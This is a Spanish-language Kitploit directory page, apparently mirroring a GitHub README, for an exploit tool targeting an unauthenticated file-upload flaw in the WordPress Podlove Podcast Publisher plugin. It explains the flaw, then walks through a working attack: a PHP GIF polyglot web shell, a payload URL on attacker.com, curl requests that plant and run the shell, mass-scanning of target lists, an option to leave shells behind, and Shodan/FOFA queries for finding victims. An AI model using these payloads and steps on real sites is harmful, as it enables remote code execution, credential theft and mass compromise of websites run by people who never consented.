Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-13001 — Exploit para CVE-2026-13001, una subida arbitraria de archivos sin autenticación en el plugin de WordPress Podlove Podcast Publisher, que permite la ejecución remota de código mediante la subida de archivos poliglotas PHP. Incluye modos de escaneo de objetivo único y masivo. | Kitploit
Herramientas/GitHubGitHub/byt3l0rd/cve-2026-13001
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubbyt3l0rd/cve-2026-13001

CVE-2026-13001

Exploit para CVE-2026-13001, una subida arbitraria de archivos sin autenticación en el plugin de WordPress Podlove Podcast Publisher, que permite la ejecución remota de código mediante la subida de archivos poliglotas PHP. Incluye modos de escaneo de objetivo único y masivo.

Ver Repositorio
hace 11h 6mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-13001 — Podlove Podcast Publisher Subida de Archivos No Autenticada con RCE

Discrepancia entre is_image() y extract_file_extension() → Subida de Políglota PHP


Resumen

CVE-2026-13001 es una vulnerabilidad crítica (CVSS 9.8) de subida arbitraria de archivos sin autenticación en el plugin de WordPress Podlove Podcast Publisher versiones ≤ 4.5.1.

La vulnerabilidad explota una discrepancia entre dos funciones internas que analizan las extensiones de archivo de manera diferente:

  • usa que → la URL aparece como ✅ (imagen válida)
is_image()
basename()
incluye cadenas de consulta
shell.php?.gif
.gif
  • extract_file_extension() usa solo la ruta de parse_url() → devuelve .php → el archivo se guarda con extensión .php 🚨
  • Los atacantes suben políglotas PHP GIF89a (cabecera GIF válida + PHP incrustado) que pasan la validación de imagen pero se ejecutan como PHP al ser accedidos.

    Versiones Afectadas

    VersiónEstado
    ≤ 4.5.1Vulnerable
    4.5.2+Parcheada

    Descubierto por: Talal Nasraddeen vía Wordfence (14 de julio de 2026)


    Mecanismo de la Vulnerabilidad

    Causa Raíz

    root@kitploit:~
    // is_image() — usa basename() que incluye la cadena de consulta
    function is_image($url) {
        $ext = strtolower(pathinfo(basename($url), PATHINFO_EXTENSION));
        return in_array($ext, ['jpg','jpeg','png','gif','webp']);
    }
    // URL: https://attacker.com/shell.php?.gif
    // basename() → "shell.php?.gif" → ext = "gif" ✅ EVADIDO
    
    root@kitploit:~
    // extract_file_extension() — usa solo la ruta de parse_url()
    function extract_file_extension($url) {
        $path = parse_url($url, PHP_URL_PATH);
        return pathinfo($path, PATHINFO_EXTENSION);
    }
    // URL: https://attacker.com/shell.php?.gif
    // parse_url() → "/shell.php" → ext = "php" 🚨 GUARDADO COMO .php
    

    Flujo del Ataque

    root@kitploit:~
    1. El atacante aloja un políglota PHP GIF89a en attacker.com/shell.php?.gif
    2. GET /?podlove_image_cache_url={hex(url)}&podlove_file_name=test
    3. is_image() valida la extensión .gif → PASA
    4. El plugin descarga el archivo → lo guarda como test_original.php en cache/
    5. El atacante accede a /wp-content/cache/podlove/{hash}/test_original.php
    6. PHP se ejecuta → RCE
    

    Instalación

    root@kitploit:~
    git clone https://github.com/shinthink/CVE-2026-13001.git
    cd CVE-2026-13001
    pip install -r requirements.txt
    

    Uso

    root@kitploit:~
    # Objetivo único
    python cve_2026_13001.py -t target.com
    
    # Escaneo masivo
    python cve_2026_13001.py -f targets.txt -o shells.txt
    
    # URL de payload personalizada
    python cve_2026_13001.py -t target.com --payload-url https://yourserver/shell.php?.gif
    
    # Modo depuración, dejar shells
    python cve_2026_13001.py -t target.com --debug --no-cleanup
    

    Argumentos

    root@kitploit:~
      -t, --target       Objetivo único (dominio o IP)
      -f, --file         Lista de objetivos, uno por línea
      -o, --output       Guardar URLs RCE en un archivo
      --payload-url      URL que aloja el políglota PHP (por defecto: GitHub raw)
      --threads          Trabajadores concurrentes (por defecto: 30)
      --no-cleanup       Dejar shells en el objetivo
      --debug            Mostrar cada solicitud HTTP
      -v, --verbose      Salida detallada
    

    Prueba de Concepto

    Objetivo Único

    root@kitploit:~
    $ python cve_2026_13001.py -t podcast-site.com
    
    root@kitploit:~
      Podlove Podcast Publisher | CVE-2026-13001 | CVSS 9.8
    
      Host       : podcast-site.com
      Podlove    : SÍ v4.5.1
      Subida     : SÍ
      RCE        : SÍ
      Shell      : https://podcast-site.com/wp-content/cache/podlove/a1/b2.../think_xxx_original.php?t=TOKEN
      Salida     : uid=33(www-data) gid=33(www-data)
      Tiempo     : 4.2s
    

    Escaneo Masivo

    root@kitploit:~
      Objetivos: 500  |  Hilos: 30
      URL del payload: https://raw.githubusercontent.com/shinthink/payloads/main/shell.gif
    
      [RCE] podcast-vuln-01.com       https://podcast-vuln-01.com/wp-content/cache/podlove/...
      [150/500] 30% | Det:42 RCE:8
    

    Explotación Manual

    Paso 1 — Alojar un shell políglota

    root@kitploit:~
    // shell.php — guárdalo y alójalo en tu servidor
    GIF89a<?php system($_GET['c']); ?>
    

    Paso 2 — Codificar en hexadecimal la URL con la evasión

    root@kitploit:~
    # URL: https://attacker.com/shell.php?.gif
    echo -n "https://attacker.com/shell.php?.gif" | xxd -p | tr -d '\n'
    

    Paso 3 — Activar la descarga de caché

    root@kitploit:~
    curl 'https://target.com/?podlove_image_cache_url=68747470733a2f2f...&podlove_file_name=shell&podlove_width=100&podlove_height=100&podlove_crop=0'
    

    Paso 4 — Acceder al shell

    root@kitploit:~
    # Ruta: wp-content/cache/podlove/{h[:2]}/{h[2:]}/{name}_original.php
    curl 'https://target.com/wp-content/cache/podlove/a1/b2c3.../shell_original.php?c=id'
    

    FOFA / Shodan

    root@kitploit:~
    FOFA:   body="podlove-podcasting-plugin-for-wordpress"
    Shodan: http.html:"podlove"
    

    Impacto

    Una explotación exitosa produce ejecución remota de código como el usuario del servidor web:

    • Extraer wp-config.php → credenciales de la base de datos
    • Acceder a todo el contenido de WordPress, usuarios y datos de plugins
    • Implementar puertas traseras persistentes
    • Moverse lateralmente hacia redes internas

    Aviso Legal

    SOLO CON FINES EDUCATIVOS Y DE PRUEBAS AUTORIZADAS.

    Los autores no asumen ninguna responsabilidad por el mal uso.


    Referencias

    RecursoEnlace
    Aviso de Wordfencewordfence.com
    Comunicado de seguridad de Podlovepodlove.org
    Entrada NVDCVE-2026-13001
    InvestigadorTalal Nasraddeen

    No afiliado con Podlove.

    Descargar herramienta